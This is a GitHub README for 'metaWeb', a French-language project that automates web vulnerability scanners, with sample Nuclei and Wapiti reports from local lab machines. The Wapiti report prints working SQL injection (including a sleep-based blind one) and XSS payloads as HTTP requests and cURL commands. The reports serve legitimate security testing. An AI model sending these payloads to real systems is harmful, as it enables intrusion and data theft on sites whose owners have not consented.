Skip to content

M0rPH3U53/metaWeb

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 

Repository files navigation

metaWeb_zeus

Automatisation des scanner de vulns

ZAP-OWASP --> https://www.zaproxy.org
⚛️ Nuclei --> https://github.com/projectdiscovery/nuclei
🐂 Wapiti --> https://wapiti-scanner.github.io
👽 Nikto --> https://cirt.net/nikto2
🐟 Skipfish --> https://github.com/spinkham/skipfish

🛠️ Installation d'outils & emoji

┌─[m0rph3u5@parrot]─[~]
└──╼ $ sudo apt install skipfish wapiti zaproxy nikto nuclei fonts-noto-color-emoji

👁️ Demo

metaWeb.mp4

📝 Rapports

⚡ ZAP

zap-rapport

⚛️ Nuclei

┌─[m0rph3u5@parrot]─[~/Documents]
└──╼ $cat metaWeb/Sumo/nuclei/Sumo-rapport.txt
[CVE-2014-6271] [http] [critical] http://192.168.56.253/cgi-bin/test [paths="/cgi-bin/test"]
[waf-detect:apachegeneric] [http] [info] http://192.168.56.253
[ssh-auth-methods] [javascript] [info] 192.168.56.253:22 ["["publickey","password"]"]
[ssh-diffie-hellman-logjam] [javascript] [low] 192.168.56.253:22
[ssh-weak-mac-algo] [javascript] [low] 192.168.56.253:22
[ssh-weak-algo-supported] [javascript] [medium] 192.168.56.253:22
[ssh-sha1-hmac-algo] [javascript] [info] 192.168.56.253:22
[ssh-cbc-mode-ciphers] [javascript] [low] 192.168.56.253:22
[ssh-server-enumeration] [javascript] [info] 192.168.56.253:22 ["SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.10"]
[ssh-password-auth] [javascript] [info] 192.168.56.253:22
[ssh-weakkey-exchange-algo] [javascript] [low] 192.168.56.253:22
[options-method] [http] [info] http://192.168.56.253 ["GET,HEAD,POST,OPTIONS"]
[apache-detect] [http] [info] http://192.168.56.253 ["Apache/2.2.22 (Ubuntu)"]
[http-missing-security-headers:strict-transport-security] [http] [info] http://192.168.56.253
[http-missing-security-headers:content-security-policy] [http] [info] http://192.168.56.253
[http-missing-security-headers:x-frame-options] [http] [info] http://192.168.56.253
[http-missing-security-headers:referrer-policy] [http] [info] http://192.168.56.253
[http-missing-security-headers:clear-site-data] [http] [info] http://192.168.56.253
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://192.168.56.253
[http-missing-security-headers:permissions-policy] [http] [info] http://192.168.56.253
[http-missing-security-headers:x-content-type-options] [http] [info] http://192.168.56.253
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://192.168.56.253
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://192.168.56.253
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://192.168.56.253

🐂 Wapiti

┌─[parrot@parrot]─[~/Documents]
└──╼ $cat metaWeb/Vicnum/wapiti/Vicnum-rapport.txt
********************************************************************************
                     Wapiti 3.0.4 - wapiti.sourceforge.io
                      Rapport pour http://192.168.56.99/
                Date du scan : Sat, 15 Feb 2025 23:30:11 +0000
                          Portée de ce scan : folder
********************************************************************************

Résumé des vulnérabilités :
---------------------------
                                                      Copie de sauvegarde :   0
                                                 Injection SQL en aveugle :   1
                                                     Identifiants faibles :   0
                                                           Injection CRLF :   0
               Configuration de la stratégie de securité du contenu (CSP) :   1
                                               Cross Site Request Forgery :   0
                                        Fichier potentiellement dangereux :   0
                                                    Exécution de commande :   0
                                                    Traversée de dossiers :   0
                                                Contournement de htaccess :   0
                                                      HTTP Secure Headers :   4
                                                     HttpOnly Flag cookie :   0
                                                            Open Redirect :   0
                                                       Secure Flag cookie :   0
                                                            Injection SQL :   1
                                              Server Side Request Forgery :   0
                                                     Cross Site Scripting :   2
                                                      XML External Entity :   0
********************************************************************************

Injection SQL en aveugle
------------------------
Vulnérabilité d'injection SQL en aveugle via une injection dans le paramètre player
Evil request:
    POST /vicnum5.php HTTP/1.1
    Host: 192.168.56.99
    Referer: http://192.168.56.99/
    Content-Type: application/x-www-form-urlencoded

    player=%27+or+sleep%287%29%231
PoC en commande cURL : "curl "http://192.168.56.99/vicnum5.php" -e "http://192.168.56.99/" -d "player=%27+or+sleep%287%29%231""

                                  *   *   *

********************************************************************************

Configuration de la stratégie de securité du contenu (CSP)
----------------------------------------------------------
CSP n'est pas défini
Evil request:
    GET / HTTP/1.1
    Host: 192.168.56.99
PoC en commande cURL : "curl "http://192.168.56.99/""

                                  *   *   *

********************************************************************************

HTTP Secure Headers
-------------------
L'entête X-Frame-Options n'est pas défini
Evil request:
    GET / HTTP/1.1
    Host: 192.168.56.99
PoC en commande cURL : "curl "http://192.168.56.99/""

                                  *   *   *

L'entête X-XSS-Protection n'est pas défini
Evil request:
    GET / HTTP/1.1
    Host: 192.168.56.99
PoC en commande cURL : "curl "http://192.168.56.99/""

                                  *   *   *

L'entête X-Content-Type-Options n'est pas défini
Evil request:
    GET / HTTP/1.1
    Host: 192.168.56.99
PoC en commande cURL : "curl "http://192.168.56.99/""

                                  *   *   *

L'entête Strict-Transport-Security n'est pas défini
Evil request:
    GET / HTTP/1.1
    Host: 192.168.56.99
PoC en commande cURL : "curl "http://192.168.56.99/""

                                  *   *   *

********************************************************************************

Injection SQL
-------------
Injection SQL (DMBS: MySQL) via une injection dans le paramètre player
Evil request:
    POST /vicnum5.php HTTP/1.1
    Host: 192.168.56.99
    Referer: http://192.168.56.99/
    Content-Type: application/x-www-form-urlencoded

    player=default%C2%BF%27%22%28
PoC en commande cURL : "curl "http://192.168.56.99/vicnum5.php" -e "http://192.168.56.99/" -d "player=default%C2%BF%27%22%28""

                                  *   *   *

********************************************************************************

Cross Site Scripting
--------------------
Vulnérabilité XSS trouvée via l'injection dans le paramètre player
Evil request:
    POST /cgi-bin/vicnum1.pl HTTP/1.1
    Host: 192.168.56.99
    Referer: http://192.168.56.99/
    Content-Type: application/x-www-form-urlencoded

    player=%3CScRiPt%3Ealert%28%27wrvy2bqhzw%27%29%3C%2FsCrIpT%3E&admin=N
PoC en commande cURL : "curl "http://192.168.56.99/cgi-bin/vicnum1.pl" -e "http://192.168.56.99/" -d "player=%3CScRiPt%3Ealert%28%27wrvy2bqhzw%27%29%3C%2FsCrIpT%3E&admin=N""

                                  *   *   *

Vulnérabilité XSS trouvée via l'injection dans le paramètre player
Evil request:
    POST /vicnum5.php HTTP/1.1
    Host: 192.168.56.99
    Referer: http://192.168.56.99/
    Content-Type: application/x-www-form-urlencoded

    player=%3CScRiPt%3Ealert%28%27wx9h6utjyu%27%29%3C%2FsCrIpT%3E
PoC en commande cURL : "curl "http://192.168.56.99/vicnum5.php" -e "http://192.168.56.99/" -d "player=%3CScRiPt%3Ealert%28%27wx9h6utjyu%27%29%3C%2FsCrIpT%3E""

                                  *   *   *

********************************************************************************

Résumé des anomalies :
----------------------
                                                Erreur interne au serveur :   0
                                       Consommation anormale de ressource :   0
********************************************************************************
Résumé des informations complémentaires :
-----------------------------------------
                                               Technologie web identifiée :   0
********************************************************************************

About

Automatisation des scanner de vulns web avec génération de rapport pour chaque outils

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages